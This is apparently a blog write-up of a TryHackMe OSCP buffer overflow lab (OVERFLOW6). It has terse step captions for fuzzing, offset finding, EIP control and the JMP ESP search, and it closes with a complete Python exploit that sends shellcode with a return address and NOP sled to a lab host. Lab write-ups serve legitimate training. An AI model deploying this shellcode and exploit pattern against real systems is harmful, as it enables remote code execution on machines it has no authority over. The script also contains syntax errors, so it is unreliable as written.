TryHackme! — OSCP Buffer Overflow

Login and reach to dashboard for module : Buffer Overflow Prep
select HOME network when asked for
It says it runs on port 1337
Since we are exploiting OVERFLOW6 , we will use OVERFLOW6 to see what input goes and what output we get.
fuzzing.py
running fuzzing.py
attach oscp.exe and press run
running is seen in bottom right corner
We will use this in offset finding python script
Offset is the same value generated by our metasploit-framework pattern create ruby script
paused is seen in bottom right corner. Also the pattern we created is seen in registers, with EIP reflecting at 35694234
we see exact match is at 1034
we see EIP is overwritten with B (hex x42)
nothing different happens on ESP and EIP.
typing !mona modules in left botton corner, shows the presence of all modules identified by mona.
JMP ESP is FF E4 in hex
we see we have atleast 6 different addresses in essfunc.dll , with JMP ESP
We see we have JMP ESP in this address
breakpoint gets a hit and program is paused.
#!/usr/bin/python 
import sys,socket
from time import sleep
payload = ("\xba\xcb\xbe\xb2\x9c\xda\xd9\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x52\x83\xe8\xfc\x31\x50\x0e\x03\x9b\xb0\x50\x69\xe7\x25\x16"
"\x92\x17\xb6\x77\x1a\xf2\x87\xb7\x78\x77\xb7\x07\x0a\xd5\x34"
"\xe3\x5e\xcd\xcf\x81\x76\xe2\x78\x2f\xa1\xcd\x79\x1c\x91\x4c"
"\xfa\x5f\xc6\xae\xc3\xaf\x1b\xaf\x04\xcd\xd6\xfd\xdd\x99\x45"
"\x11\x69\xd7\x55\x9a\x21\xf9\xdd\x7f\xf1\xf8\xcc\x2e\x89\xa2"
"\xce\xd1\x5e\xdf\x46\xc9\x83\xda\x11\x62\x77\x90\xa3\xa2\x49"
"\x59\x0f\x8b\x65\xa8\x51\xcc\x42\x53\x24\x24\xb1\xee\x3f\xf3"
"\xcb\x34\xb5\xe7\x6c\xbe\x6d\xc3\x8d\x13\xeb\x80\x82\xd8\x7f"
"\xce\x86\xdf\xac\x65\xb2\x54\x53\xa9\x32\x2e\x70\x6d\x1e\xf4"
"\x19\x34\xfa\x5b\x25\x26\xa5\x04\x83\x2d\x48\x50\xbe\x6c\x05"
"\x95\xf3\x8e\xd5\xb1\x84\xfd\xe7\x1e\x3f\x69\x44\xd6\x99\x6e"
"\xab\xcd\x5e\xe0\x52\xee\x9e\x29\x91\xba\xce\x41\x30\xc3\x84"
"\x91\xbd\x16\x0a\xc1\x11\xc9\xeb\xb1\xd1\xb9\x83\xdb\xdd\xe6"
"\xb4\xe4\x37\x8f\x5f\x1f\xd0\xba\x9b\x13\x71\xd3\xa1\x2b\x71"
"\x73\x2f\xcd\x1b\x63\x79\x46\xb4\x1a\x20\x1c\x25\xe2\xfe\x59"
"\x65\x68\x0d\x9e\x28\x99\x78\x8c\xdd\x69\x37\xee\x48\x75\xed"
"\x86\x17\xe4\x6a\x56\x51\x15\x25\x01\x36\xeb\x3c\xc7\xaa\x52"
"\x97\xf5\x36\x02\xd0\xbd\xec\xf7\xdf\x3c\x60\x43\xc4\x2e\xbc"
"\x4c\x40\x1a\x10\x1b\x1e\xf4\xd6\xf5\xd0\xae\x80\xaa\xba\x26"
"\x54\x81\x7c\x30\x59\xcc\x0a\xdc\xe8\xb9\x4a\xe3\xc5\x2d\x5b"
"\x9c\x3b\xce\xa4\x77\xf8\xfe\xee\xd5\xa9\x96\xb6\x8c\xeb\xfa"
"\x48\x7b\x2f\x03\xcb\x89\xd0\xf0\xd3\xf8\xd5\xbd\x53\x11\xa4"
"\xae\x31\x15\x1b\xce\x13")
shellcode = "A" * 1034 + "\xaf\x11\x50\x62" + "\x90"*16 + payload +"\r\n"try:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('10.10.152.174',1337)))
s.send(("OVERFLOW6 "+ shellcode))
s.recv(1024)
s.close()

except:
print "Error Connecting to server"
sys.exit()

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Dhanishtha Awasthi

Dhanishtha Awasthi

OSCP | CEH | Cyber Security Enthusiast.